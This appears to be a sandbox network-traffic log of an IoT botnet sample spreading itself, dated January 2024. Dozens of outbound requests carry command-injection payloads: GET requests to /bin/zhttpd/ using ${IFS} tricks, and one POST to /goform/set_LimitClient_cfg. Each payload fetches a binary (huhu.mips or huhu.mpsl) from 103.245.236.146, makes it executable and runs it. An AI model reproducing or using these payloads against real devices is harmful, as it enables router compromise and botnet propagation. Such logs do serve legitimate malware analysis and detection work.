                                      Jan 19, 2024 17:29:31.759592056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4302192.168.2.144088645.223.47.788080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.016199112 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:32.150520086 CET909INHTTP/1.1 503 Service Unavailable
                                      Content-Type: text/html
                                      Cache-Control: no-cache, no-store
                                      Connection: close
                                      Content-Length: 689
                                      X-Iinfo: 14-140205856-0 0NNN RT(1705681771440 2) q(0 -1 -1 -1) r(0 -1)
                                      Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 35 26 78 69 6e 66 6f 3d 31 34 2d 31 34 30 32 30 35 38 35 36 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 37 30 35 36 38 31 37 37 31 34 34 30 25 32 30 32 25 32 39 25 32 30 71 25 32 38 30 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 36 36 38 32 37 36 31 36 36 36 35 30 33 30 34 37 38 32 26 65 64 65 74 3d 39 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 50 4f 53 54 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 36 36 38 32 37 36 31 36 36 36 35 30 33 30 34 37 38 32 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=5&xinfo=14-140205856-0%200NNN%20RT%281705681771440%202%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29&incident_id=0-668276166650304782&edet=9&cinfo=ffffffff&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-668276166650304782</iframe></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4303192.168.2.144607243.253.100.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.767906904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4304192.168.2.143539839.221.210.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.767939091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4305192.168.2.144445431.146.188.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.767975092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4306192.168.2.1458770162.245.80.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768012047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4307192.168.2.145831243.254.214.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768054962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4308192.168.2.143432863.3.93.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768100023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4309192.168.2.1443978219.174.179.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768127918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4310192.168.2.1455834203.149.141.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768187046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4311192.168.2.144691451.217.114.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768213034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4312192.168.2.1441690194.32.112.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768244028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4313192.168.2.145189825.75.9.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768286943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4314192.168.2.1453468182.109.146.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768332005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4315192.168.2.1452716201.130.132.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768352032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4316192.168.2.1440698216.117.152.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768419027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4317192.168.2.1447130141.77.76.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768457890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4318192.168.2.143951697.85.178.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768484116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4319192.168.2.14332262.154.37.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768517971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4320192.168.2.1437728185.175.99.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768577099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4321192.168.2.1447992126.140.151.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768616915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4322192.168.2.144288636.92.144.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768665075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4323192.168.2.144022027.61.36.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768702984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4324192.168.2.1438900143.37.149.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768733025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4325192.168.2.1451338222.112.121.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768826962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4326192.168.2.144453417.116.149.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768883944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4327192.168.2.1445150165.135.232.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768910885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4328192.168.2.145224014.0.215.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.768945932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4329192.168.2.144506838.48.233.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769015074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4330192.168.2.1458462163.7.235.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769059896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4331192.168.2.144506094.54.251.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769109964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4332192.168.2.143931063.185.156.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769139051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4333192.168.2.1455624100.231.51.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769166946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4334192.168.2.14387701.79.172.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769212008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4335192.168.2.1459140112.214.35.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769257069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4336192.168.2.14360384.89.143.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769284964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4337192.168.2.1453336205.73.46.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769335985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4338192.168.2.1441330117.26.155.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769375086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4339192.168.2.143552692.214.143.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769402981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4340192.168.2.1445546191.98.154.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769449949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4341192.168.2.1443354145.210.217.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769499063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4342192.168.2.1456972185.2.25.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769537926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4343192.168.2.145374880.56.147.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769593000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4344192.168.2.143295817.32.187.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769624949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4345192.168.2.143364666.107.19.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769676924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4346192.168.2.1457384181.243.26.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769711971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4347192.168.2.144313820.77.153.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769737959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4348192.168.2.1449772155.73.164.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769798994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4349192.168.2.1445280180.145.249.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769829035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4350192.168.2.143612839.196.67.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769865990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4351192.168.2.145889298.147.230.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769912958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4352192.168.2.1460900114.107.165.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769942045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4353192.168.2.143461688.107.77.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:32.769989014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4354192.168.2.145173873.194.163.227443
                                      TimestampBytes transferredDirectionData
